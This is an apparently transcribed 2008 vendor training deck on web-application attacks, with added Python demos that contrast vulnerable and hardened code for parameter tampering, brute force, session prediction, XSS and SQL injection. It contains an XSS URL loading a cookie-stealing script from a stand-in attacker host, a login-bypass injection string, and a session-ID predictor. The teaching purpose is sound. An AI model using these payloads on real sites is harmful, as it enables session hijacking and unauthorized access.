Hacking 101
January 22, 2008
Security Landscape
Objective
● Understand the web application environment
● Understand and differentiate between network and application level vulnerabilities
● Understand where the vulnerabilities exist
[Diagram: web backend layers, front to back: Firewall, Web Servers, Application Server, Databases]
Common objections (speech bubbles on the slide):
● "We have firewalls in place"
● "We audit it once a quarter with pen testers"
● "We use network vulnerability scanners"
None of these controls inspects the traffic the firewall is configured to let through: a firewall that permits port 80 and 443 passes application attacks exactly as it passes legitimate requests, and network scanners report missing patches, not logic flaws in custom code.
Where attacks land versus where security budget goes (pie-chart figures reconstructed from the slide):

                     % of Attacks    % of Dollars
Web Applications         75%             10%
Network / Server         25%             90%
Web application threat classes (the Web Application Security Consortium threat classification):

Authentication: attacks that target a web site's method of validating the identity of a user, service or application.
● Brute Force
● Insufficient Authentication

Authorization: attacks that target a web site's method of determining if a user, service or application has the necessary permissions to perform a requested action.
● Credential/Session Prediction
● Insufficient Authorization
● Insufficient Session Expiration
● Session Fixation

Client-side Attacks: the abuse or exploitation of a web site's users (breaching trust relationships between a user and a web site).
● Content Spoofing
● Cross Site Scripting

Command Execution: attacks designed to execute remote commands on the web site by manipulating user-supplied input fields.
● Buffer Overflow
● Format String Attack
● LDAP Injection
● OS Commanding
● SQL Injection
● SSI Injection
● XPath Injection

Information Disclosure: attacks designed to acquire system-specific information about a web site. This includes software distribution, version numbers, patch levels, and also secure file locations.
● Directory Indexing
● Information Leakage
● Path Traversal
● Predictable Resource Location

Logical Attacks: the abuse or exploitation of a web application's logic flow (password recovery, account registration, auction bidding and eCommerce purchasing are examples of application logic).
● Abuse of Functionality
● Denial of Service
● Insufficient Anti-automation
● Insufficient Process Validation
Parameter Tampering
● What is it?
Parameters (query-string values, form fields, hidden fields, cookies) carry information from the client to the application.
Because the client controls every one of them, any can be changed; the most visible case is editing a value in the site's URL.
● Why does parameter tampering exist?
Developers focus on the legal values of parameters and how they should be used.
Little if any attention is given to incorrect or unexpected values, and the check that a value belongs to the current user is often assumed rather than performed.
● Business Impact
The application can perform a function that was not intended by its developer like giving
access to customer information.
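The pattern in concrete form, as an added example that is not from the original deck: a hypothetical account-balance handler that trusts the client-supplied "acct" URL parameter, beside one that decides ownership from server-side session state. The account data, user names and bank.example URLs are constructed for the illustration.

```python
# Added example (not from the Watchfire deck): parameter tampering against an
# account lookup. ACCOUNTS, the user names and the URLs are all constructed.
from urllib.parse import urlsplit, parse_qs

# Constructed sample data: which login owns which account number.
ACCOUNTS = {
    "800001": {"owner": "jsmith", "balance": 1250.00},
    "800002": {"owner": "bjones", "balance": 98000.00},
}


class Forbidden(Exception):
    pass


def query_param(url, name):
    """Return the first value of a query-string parameter, or None."""
    return parse_qs(urlsplit(url).query).get(name, [None])[0]


def can_view(session_user, acct):
    """Ownership is decided by server-side data, never by the request."""
    record = ACCOUNTS.get(acct)
    return record is not None and record["owner"] == session_user


def balance_vulnerable(session_user, url):
    # Trusts the URL parameter: any logged-in user reads any account simply by
    # editing the number in the address bar (session_user is never consulted).
    acct = query_param(url, "acct")
    return ACCOUNTS[acct]["balance"]


def balance_hardened(session_user, url):
    # Same parameter, but the request is refused unless the authenticated
    # session actually owns the account it names.
    acct = query_param(url, "acct")
    if not can_view(session_user, acct):
        raise Forbidden(f"{session_user} may not view account {acct}")
    return ACCOUNTS[acct]["balance"]


if __name__ == "__main__":
    legit = "https://bank.example/balance?acct=800001"
    tampered = "https://bank.example/balance?acct=800002"  # edited by jsmith
    print(balance_vulnerable("jsmith", tampered))   # another customer's balance
    try:
        balance_hardened("jsmith", tampered)
    except Forbidden as e:
        print("blocked:", e)
    print(balance_hardened("jsmith", legit))
```

The fix is not to hide the parameter (a hidden form field or an opaque-looking number is just as editable); it is to re-derive authorization on the server from the session for every request.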
Brute Force
● What is it?
An automated trial-and-error process used to guess a person's username, password, credit-card number or cryptographic keys.
● Why do Brute Force attacks exist?
Weak passwords and weak password storage or encryption
Easy to guess, dictionary based
No account lockout or rate limiting
Site doesn't lock out a user after a small number (e.g. 3) of invalid login attempts, so the attacker can try an entire dictionary
● Business Impact
It may be possible to escalate user privileges and gain administrative permissions over the
web application
Confidential information disclosure
Financial risk
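What a lockout actually buys you, as an added example that is not from the original deck: a hypothetical login guard that locks an account after N consecutive failures, with a constructed dictionary attack run against it with and without the guard. The user store, the password list and the lockout parameters are made up for the illustration.

```python
# Added example (not from the Watchfire deck): brute-force login with and
# without account lockout. USERS, DICTIONARY and the thresholds are constructed.
import hashlib
import hmac
import os
import time

PBKDF2_ROUNDS = 50_000


def _hash(pw, salt):
    """Salted PBKDF2 so a stolen user table is not itself a password list."""
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ROUNDS)


_salt = os.urandom(16)
USERS = {"jsmith": (_salt, _hash("demo1234", _salt))}   # constructed store

# Constructed attacker word list; the real password is the fifth entry.
DICTIONARY = ["password", "123456", "letmein", "qwerty", "demo1234", "welcome"]


class LoginGuard:
    """Counts consecutive failures per username and refuses logins while locked."""

    def __init__(self, max_failures=3, lockout_seconds=900, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout = lockout_seconds
        self.clock = clock
        self.failures = {}       # username -> consecutive failures
        self.locked_until = {}   # username -> time the lockout ends

    def is_locked(self, user):
        return self.clock() < self.locked_until.get(user, 0.0)

    def login(self, user, password):
        """Return 'ok', 'bad' or 'locked'."""
        if self.is_locked(user):
            return "locked"      # refused before the password is even checked
        salt, expected = USERS.get(user, (b"", b""))
        # Hash even for unknown users so timing does not reveal valid names.
        if user in USERS and hmac.compare_digest(_hash(password, salt), expected):
            self.failures[user] = 0
            return "ok"
        n = self.failures.get(user, 0) + 1
        self.failures[user] = n
        if n >= self.max_failures:
            self.locked_until[user] = self.clock() + self.lockout
            self.failures[user] = 0
        return "bad"


def dictionary_attack(guard, user, words):
    """Return (password_found_or_None, attempts_made) for a guess-in-order attack."""
    attempts = 0
    for w in words:
        attempts += 1
        result = guard.login(user, w)
        if result == "ok":
            return w, attempts
        if result == "locked":
            return None, attempts
    return None, attempts


if __name__ == "__main__":
    print(dictionary_attack(LoginGuard(max_failures=3), "jsmith", DICTIONARY))
    print(dictionary_attack(LoginGuard(max_failures=10**9), "jsmith", DICTIONARY))
```

A per-account lockout stops a single-target attack but also gives attackers a denial-of-service lever against legitimate users; in practice it is paired with per-source rate limiting and a slow hash, so that even an attacker who spreads attempts across many accounts gains little per second.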
Directory Indexing
● What is it?
It is possible to view and download the contents of certain web application virtual directories,
which may contain restricted files.
● Why does Directory Indexing exist?
The web server is left configured to generate a file listing for any directory that has no index page
Web-based administration tools
'Hidden', not linked to the main site (easier to set up, but a danger if the admin site is reachable by URL, because obscurity is standing in for authentication)
'/admin' directory off of the root
● Business Impact
Attacker can view confidential files
Attacker can construct a targeted attack plan for your site
Directory navigation to restricted areas of the site
Credential/Session Prediction
● What is it?
A method of hijacking or impersonating a web site user by deducing or guessing the value that identifies their session
Often lumped together with "cookie poisoning", since the forged value is usually delivered in a cookie
● Why do Credential/Session Prediction attacks exist?
Session IDs are stored as cookies, hidden fields or URL values
An attacker collects several IDs, works out the algorithm used to generate them (a counter, a timestamp, a weak random generator), and forges the ID of a current user or of the next session to be issued
● Business Impact
User impersonation
Fraudulent access to, and use of, a user's (or many users') information, account and confidential details
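How the prediction works, as an added example that is not from the original deck: a hypothetical weak session-ID generator (a counter concatenated with the issue time, a scheme several older frameworks used), a predictor that recovers the next ID from two observed ones, and a CSPRNG-based generator beside it. All IDs and timestamps are constructed.

```python
# Added example (not from the Watchfire deck): credential/session prediction
# against a structured session ID. The generator, the IDs and the timestamps
# are constructed; the weak scheme is a hypothetical one.
import secrets
import time


class WeakSessions:
    """Session ID = 8 hex digits of a per-login counter + 8 hex digits of the
    issue time. Looks random in a cookie viewer; has almost no entropy."""

    def __init__(self, start=1000):
        self.counter = start

    def new_id(self, now=None):
        now = int(time.time() if now is None else now)
        self.counter += 1
        return f"{self.counter:08x}{now:08x}"


def parse_weak(sid):
    """Split an ID back into (counter, issue_time)."""
    return int(sid[:8], 16), int(sid[8:], 16)


def predict_next(observed_a, observed_b, window=60):
    """The attacker logs in twice and receives observed_a, observed_b.
    Returns the candidate IDs the next victim will be issued within `window`
    seconds: the counter is known exactly, the time only to a window."""
    ca, ta = parse_weak(observed_a)
    cb, tb = parse_weak(observed_b)
    step = cb - ca
    return [f"{cb + step:08x}{t:08x}" for t in range(tb, tb + window)]


class StrongSessions:
    """128 bits straight from the OS CSPRNG: no structure to extrapolate."""

    def new_id(self):
        return secrets.token_hex(16)


if __name__ == "__main__":
    weak = WeakSessions()
    a = weak.new_id(now=1_200_000_000)         # attacker's first login
    b = weak.new_id(now=1_200_000_005)         # attacker's second login
    victim = weak.new_id(now=1_200_000_030)    # next real user
    guesses = predict_next(a, b)
    print(len(guesses), "candidates; victim hit:", victim in guesses)
    print("strong:", StrongSessions().new_id())
```

Sixty candidates is a handful of requests with a forged cookie; against 128 random bits the same attacker has no better strategy than trying 2^128 values. Structure in an ID (monotonic parts, base64 of a timestamp, a username) is the tell to look for during a review.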
Session hijacking through cross-site scripting (demo URL from the slide; the diagram showed the attacker, labelled "Bad Guy", getting a user to follow this link):

http://www.altoromutual.com/altoro/search.aspx?txtSearch=%3Cscript+src%3D%22http%3A%2F%2Fwww.evilsite.com%2Fxss%2Fhijack.js%22%3E%3C%2Fscript%3E

Decoded, the txtSearch parameter is <script src="http://www.evilsite.com/xss/hijack.js"></script>. The search page echoes the term into its response, so the victim's browser loads the attacker's script in the context of the site, where it can read the session cookie.
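The reflection and its fix, as an added example that is not from the original deck: the demo URL above is decoded, then rendered by a hypothetical search page that echoes txtSearch raw and by one that HTML-encodes it. The cookie header at the end is a constructed illustration of the flag that keeps a script like hijack.js from reading the session ID; the cookie name is assumed.

```python
# Added example (not from the Watchfire deck): reflected XSS from the slide's
# demo URL, vulnerable and encoded rendering, and a cookie header that denies
# script access to the session. Renderers and the cookie name are constructed.
from html import escape
from urllib.parse import urlsplit, parse_qs

DEMO_URL = ("http://www.altoromutual.com/altoro/search.aspx?txtSearch="
            "%3Cscript+src%3D%22http%3A%2F%2Fwww.evilsite.com%2Fxss%2Fhijack.js"
            "%22%3E%3C%2Fscript%3E")


def search_term(url):
    """Extract txtSearch as the server sees it after URL decoding."""
    return parse_qs(urlsplit(url).query).get("txtSearch", [""])[0]


def render_vulnerable(term):
    # Reflects the input straight into the page: the browser parses it as markup.
    return f"<h2>Results for: {term}</h2>"


def render_hardened(term):
    # Encodes < > & " ' so the payload is displayed as text, never executed.
    return f"<h2>Results for: {escape(term, quote=True)}</h2>"


def contains_script_tag(html):
    return "<script" in html.lower()


def session_cookie_header(session_id):
    # HttpOnly hides the cookie from document.cookie (what hijack.js would read);
    # Secure keeps it off plaintext HTTP. Cookie name assumed for the demo site.
    return f"Set-Cookie: ASP.NET_SessionId={session_id}; HttpOnly; Secure; Path=/"


if __name__ == "__main__":
    term = search_term(DEMO_URL)
    print(term)
    print(render_vulnerable(term))
    print(render_hardened(term))
    print(session_cookie_header("constructed-session-id"))
```

Output encoding has to match the context the value lands in (HTML body here; attribute, JavaScript and URL contexts each need their own encoding), and HttpOnly only limits what a successful injection can steal, it does not stop the injection.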
SQL Injection
● What is it?
An attacker injects malicious characters (SQL syntax) into web application parameters in an
attempt to change the original syntax of the query.
● Why does SQL Injection exist?
User input is pasted into the query text, and hazardous characters (above all the single quote) are not escaped or, better, kept out of the SQL entirely by binding them as parameters.
● Business Impact
It is possible to view, modify or delete database entries and tables.
It is possible to alter the original query in order to bypass normal authentication mechanisms.
SQL Injection demo (from the slide):
● Normal login: Username jsmith, Password demo1234
● Probe: Username ', Password a
A lone single quote in the username tests whether the database chokes on unbalanced SQL; a database error on this input is the first sign the field is injectable. The password field still needs some value to get past the form's client-side validation, which the server never repeats.
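The probe and the bypass run against a real database engine, as an added example that is not from the original deck: a hypothetical login check against an in-memory SQLite table, first built by string concatenation (the flaw the demo exercises), then with a bound-parameter query. The user table is constructed; storing passwords in clear text as it does is itself a defect, left in only so the two queries stay comparable.

```python
# Added example (not from the Watchfire deck): SQL injection in a login query.
# The users table and its contents are constructed.
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("jsmith", "demo1234", "customer"), ("admin", "Xk9!constructed", "admin")],
    )
    return db


def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text: a quote in the username changes the
    # statement, and "admin' --" comments the password check out entirely.
    sql = (f"SELECT username, role FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return db.execute(sql).fetchone()


def login_hardened(db, username, password):
    # Placeholders hand the values to the engine separately from the SQL, so
    # they are compared as data and never parsed as part of the statement.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


def quote_probe(db, login):
    """The slide's test: submit a lone quote and see whether the database errors."""
    try:
        login(db, "'", "a")
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    db = make_db()
    print("probe vulnerable:", quote_probe(db, login_vulnerable))   # True
    print("probe hardened:", quote_probe(db, login_hardened))       # False
    print("bypass vulnerable:", login_vulnerable(db, "admin' --", "a"))
    print("bypass hardened:", login_hardened(db, "admin' --", "a"))
```

A syntax error is the noisiest symptom, not the vulnerability itself; an application that swallows errors is still injectable, so testing should include a payload that changes the result (the "admin' --" row above) and not only one that breaks the query.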
Automated Tools
Q&A
Questions?
Resources
● Download AppScan 7.6 - http://www.watchfire.com
● For the latest whitepapers visit: http://www.watchfire.com/news/whitepapers.aspx
● Visit Watchfire at one of our upcoming shows
http://www.watchfire.com/news/events.aspx
● To register for upcoming web seminars visit
http://www.watchfire.com/news/seminars.aspx
● Contact us at sales@watchfire.com